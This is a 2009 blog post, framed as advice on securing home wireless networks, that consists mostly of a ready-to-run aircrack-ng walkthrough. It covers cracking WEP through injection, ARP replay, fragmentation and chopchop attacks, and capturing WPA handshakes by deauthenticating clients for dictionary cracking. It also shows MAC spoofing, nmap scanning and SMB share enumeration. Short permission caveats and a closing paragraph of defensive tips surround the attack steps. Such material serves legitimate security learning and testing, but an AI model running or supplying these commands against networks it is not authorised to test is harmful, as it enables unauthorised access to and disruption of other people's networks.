Sunday, October 25, 2009

How to protect your wireless home network

To understand that, we will learn how actually to break them first ;-)
It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.
I will use Ubuntu (Gnome desktop) under root account with some non-default tools
apt-get install nmap macchanger
You will need to install aircrack-ng and adapter drivers from sources to get lastest version.

I got Edimax EW-7318USg for ~$30 as recomended devices.

Shortcuts I will use in aircrack-ng suite.
AP-MAC - MAC address of access point (AP), examples:
AP-CH - channel AP is working on, ex: 11
AP-NAM - wireless network name, ex: teddy
MY-MAC - MAC address of your adapter, ex: 001f1f3676fc
CL-MAC - MAC address of client already assosiated with AP (will need for DeAuth attack), ex: 012345abcdef
Interface I will use rausb0.


Simple WEP Crack

Put the card to monitor mode
airmon-ng stop rausb0
airmon-ng start rausb0

And let's start scan
airodump-ng rausb0

Get target network and try if we can inject packets
aireplay-ng -9 -e AP-NAM -a AP-MAC rausb0
test on all rates
aireplay-ng -9 -e AP-NAM -a AP-MAC -B rausb0

Start capturing IVs for target network to files
airodump-ng -c AP-CH --bssid AP-MAC -w output rausb0

Fake authentication with the access point otherwise it will deny our packets
aireplay-ng -1 0 -e AP-NAM -a AP-MAC -h MY-MAC rausb0
aireplay-ng -1 6000 -o 1 -q 10 -e AP-NAM -a AP-MAC -h MY-MAC rausb0

Start aireplay in ARP request replay mode
aireplay-ng -3 -b AP-MAC -h MY-MAC rausb0
Or replay packets from a wireless client
aireplay-ng -2 -a AP-MAC -d ffffffffffff -m 68 -n 68 -t 1 -f 0 rausb0
Or access point to rebroadcast the packet
aireplay-ng -2 -p 0841 -b AP-MAC -c ffffffffffff -h MY-MAC rausb0
ARP packets are typically either 68 (from a wireless client) or 86 (from a wired client) bytes
aireplay-ng -2 -p 0841 -m 68 -n 86 -b AP-MAC -c ffffffffffff -h MY-MAC rausb0
Or aireplay can be used to replay packets from a pcap file
aireplay-ng -2 -p 0841 -b AP-MAC -h MY-MAC -r replay_src-0303-124624.cap rausb0
aireplay-ng -2 -p 0841 -b AP-MAC -c ffffffffffff -h MY-MAC -r some-capture.cap rausb0
Or use ready-to-send packet
aireplay-ng -2 -r arp-request rausb0

When you got from 40K to 80K data packets, we can try to crack the password
aircrack-ng -b AP-MAC output*.cap - PTW method
aircrack-ng -z -b AP-MAC output*.cap - FMS/KoreK method



When no wireless clients exists

Fragmenation attack to obtain PRGA
aireplay-ng -5 -b AP-MAC -h MY-MAC rausb0
Chopchop attack to obtain PRGA
aireplay-ng -4 -b AP-MAC -h MY-MAC rausb0

You will get some "fragment-0203-180343.xor" file for the next step.

Use packetforge-ng to create an arp packet
packetforge-ng -0 -a AP-MAC -h MY-MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-0203-180343.xor -w arp-request

You can inspect created packet
tcpdump -n -vvv -e -s0 -r arp-request
Since you are testing against your own AP (you are, right?), then decrypt the packet and ensure it is correct
airdecap-ng -e AP-NAM -w arp-request
View the decrypted packet
tcpdump -n -r arp-request-dec



How to Crack WPA/WPA2

The only way is to capture 4-way authentication handshake
Connected client deauth once
aireplay-ng -0 1 -a AP-MAC -c CL-MAC rausb0
or 3 times (to be sure ;-)
aireplay-ng -0 10 -a AP-MAC -c CL-MAC rausb0

For cracking, you will need good wordlists
aircrack-ng -w password.lst,another.lst -b AP-MAC wpa*.cap



Other useful stuff

MAC address change - manual way
ifdown rausb0
ifconfig rausb0 hw ether 00:11:22:33:44:55
ifup rausb0

But better with
macchanger --mac 00:11:22:33:44:55

Set bitrate
iwconfig rausb0 rate 54M
iwconfig rausb0 rate 11M

Scan network for devices
nmap -sP 10.0.0.1-255

Scan services on specific device
nmap 10.0.0.16
nmap -NP 10.0.0.16

Windows information and shares (if open)
smbclient -L \\10.0.0.16
smbclient -L \\10.0.0.16 -U Guest -W workgroup

Kernel modules control
lsmod | grep 73
modprobe rt73

Trace packets by
tcpdump -n -vvv -s0 -e -i | grep -i -E ”(RA:|Authentication|ssoc)”

Gnome NetworkManager (sometimes better to stop it during attacks)
/etc/init.d/NetworkManager start|stop|restart
nm-tool --list
tail -f /var/log/daemon.log | grep NetworkManager


Links

aircrac-ng tutorials and faq
Latest nmap

So, to protect your wireless network, don't use WEP, use WPA/WPA2 with long and complicated password, MAC-filtering will only pause hacker for a while (till he can see one of authenticated clients MACs), hiding SSID doesn't help at all.


UPD: Good news there from aircrack team:
updated Slitaz aircrack distribution (Aircrack-ng 1.0 final including sqlite airolib-ng support, patched drivers, etc)
WPA Cracker - cloud cracking service

No comments:

Post a Comment